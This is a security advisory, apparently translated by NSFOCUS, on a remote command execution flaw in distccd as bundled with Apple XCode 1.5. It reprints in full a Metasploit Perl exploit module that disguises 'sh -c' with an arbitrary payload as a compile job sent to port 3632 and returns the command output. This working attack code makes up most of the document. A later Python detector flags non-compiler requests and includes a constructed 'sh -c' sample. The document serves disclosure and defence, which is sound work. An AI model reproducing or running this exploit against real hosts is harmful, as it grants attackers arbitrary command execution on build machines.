XCode 1.5 and distcc 2.x Possible Arbitrary Code Execution Vulnerability

Published: 2005-03-10
Updated: 2005-03-11

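Affected systems:
Apple XCode 1.5
Samba distcc 2.x
Description:
distcc is a program for distributing C, C++, Objective C or Objective C++ code across multiple machines on a network.

The XCode 1.5 bundled by Apple allows distributed compilation. This feature actually uses the Samba distcc module (http://distcc.samba.org). An attack against distccd now exists that allows a remote attacker to access the target machine with full user-level access.

XCode bundles distcc version 2.0.1. A similar problem remains even after upgrading to version 2.18.3.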

<*Source: Ray Slakinski (rays@sdf1.net)
        Jason McLeod (jason@sdf1.net)
        H D Moore (sflist@digitaloffense.net)
  
  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111047639409069&w=2
*>

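Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use it at your own risk!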

http://metasploit.com/projects/Framework/exploits.html#distcc_exec

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::distcc_exec;
use base "Msf::Exploit";
use Pex::Text;
use strict;


my $advanced = { };

my $info =
{
    'Name'  => 'DistCC Daemon Command Execution',
    'Version'  => '$Revision: 1.6 $',
    'Authors' => [ 'H D Moore <hdm [at] metasploit.com>'],
    'Arch'  => [ ],
    'OS'    => [ ],
    'Priv'  => 0,
    'UserOpts'  => {
                    'RHOST' => [1, 'ADDR', 'The target address'],
                    'RPORT' => [1, 'PORT', 'The distccd server port', 3632],
                   },
    'Payload' => {
        'Space'    => 1024,
        'Keys'     => ['cmd', 'cmd_bash'],                
    },
    
    'Description'  => Pex::Text::Freeform(qq{
        This module uses a documented security weakness to execute
        arbitrary commands on any system running distccd.
    }),
    
    'Refs'  =>  [  ['URL', 'http://distcc.samba.org/security.html'],  ],
    'Keys'  =>  ['distcc'],
};

sub new {
  my $class = shift;
  my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  return($self);
}

sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $shellcode   = $self->GetVar('EncodedPayload')->RawPayload;
    my ($res, $len);
    
    my $s = Msf::Socket::Tcp->new
    (
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
    );
    
    if ($s->IsError) {
      $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
      return;
    }

    my $distcmd = $self->DistCommand("sh", "-c", $shellcode);
    $s->Send($distcmd);

    my $app = "DOTI0000000A"."METASPLOIT\n";
    $s->Send($app);
    
    $res = $s->Recv(24, 5);
    if (! $res || length($res) != 24) {
        $self->PrintLine("[*] The remote distccd did not reply to our request");
        return;
    }
    
    # Check STDERR
    $res = $s->Recv(4, 5);
    $res = $s->Recv(8, 5);
    $len = unpack('N', pack('H*', $res));
    if ($len) {
        $res = $s->Recv($len, 5);
        foreach (split(/\n/, $res)) {
            $self->PrintLine("stderr: $_");
        }
    }
    
    # Check STDOUT
    $res = $s->Recv(4, 5);
    $res = $s->Recv(8, 5);
    $len = unpack('N', pack('H*', $res));
    if ($len) {
        $res = $s->Recv($len, 5);
        foreach (split(/\n/, $res)) {
            $self->PrintLine("stdout: $_");
        }
    }  
}


sub DistCommand {
    my $self = shift;

    # convince distcc that this is a compile
    push @_, "#";
    push @_, "-c";
    push @_, "main.c";
    push @_, "-o";
    push @_, "main.o";
    
    # set distcc 'magic fairy dust' and argument count
    my $res = "DIST00000001".sprintf("ARGC%.8x", scalar(@_));
    
    # set the arguments
    foreach (@_) {
        $res .= sprintf("ARGV%.8x%s", length($_), $_);
    }
    
    return $res;
}

1;

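Recommendations:
Temporary workaround:

If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* Users of the distributed build system in XCode should disable this feature until Apple and Samba have put appropriate protections in place.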
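
For hosts where distccd is still running, the request header that the module above builds (DIST, ARGC, then length-prefixed ARGV tokens) can be decoded from reassembled port 3632 traffic and checked against the programs a build host should be asked to run. This is an added example, not code from this advisory, Metasploit or distcc; the COMPILERS allowlist, the MAX_ARGC bound and both sample payloads are assumptions constructed for illustration.

```python
import re

# Assumption: the only programs this build farm should run via distccd.
COMPILERS = {"cc", "c++", "gcc", "g++", "clang", "clang++"}
TOKEN = re.compile(rb"([A-Z]{4})([0-9a-fA-F]{8})")  # 4-letter tag + 8 hex digits
MAX_ARGC = 4096  # sanity bound chosen for this example

# Constructed sample payloads (client-to-server bytes), not real captures.
BENIGN = (b"DIST00000001ARGC00000005ARGV00000003gccARGV00000002-c"
          b"ARGV00000006main.cARGV00000002-oARGV00000006main.o")
SUSPECT = b"DIST00000001ARGC00000003ARGV00000002shARGV00000002-cARGV00000004true"

def parse_request(data):
    """Decode the DIST/ARGC/ARGV header; return (protocol_version, argv)."""
    pos = 0

    def token(tag):
        nonlocal pos
        m = TOKEN.match(data, pos)
        if m is None or m.group(1) != tag:
            raise ValueError("expected %s token at offset %d" % (tag.decode(), pos))
        pos = m.end()
        return int(m.group(2), 16)

    version = token(b"DIST")
    argc = token(b"ARGC")
    if argc > MAX_ARGC:
        raise ValueError("implausible ARGC %d" % argc)
    argv = []
    for _ in range(argc):
        length = token(b"ARGV")
        if pos + length > len(data):
            raise ValueError("ARGV payload truncated")
        # Length-prefixed, so an argument may itself contain "ARGV".
        argv.append(data[pos:pos + length].decode("latin-1"))
        pos += length
    return version, argv

def findings(argv):
    """Return reasons the request does not look like a compile job."""
    if not argv:
        return ["request carries no arguments"]
    prog = argv[0].rsplit("/", 1)[-1]
    if prog not in COMPILERS:
        return ["argv[0] %r is not an allowlisted compiler" % argv[0]]
    return []

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("suspect", SUSPECT)):
        version, argv = parse_request(blob)
        print(name, version, argv, findings(argv) or "ok")
```

An allowlist on argv[0] only identifies requests that name a non-compiler program; it is a monitoring aid while the feature is being disabled, not a replacement for the workaround above.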

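Vendor patch:

Samba
-----
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://www.samba.org/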

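This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.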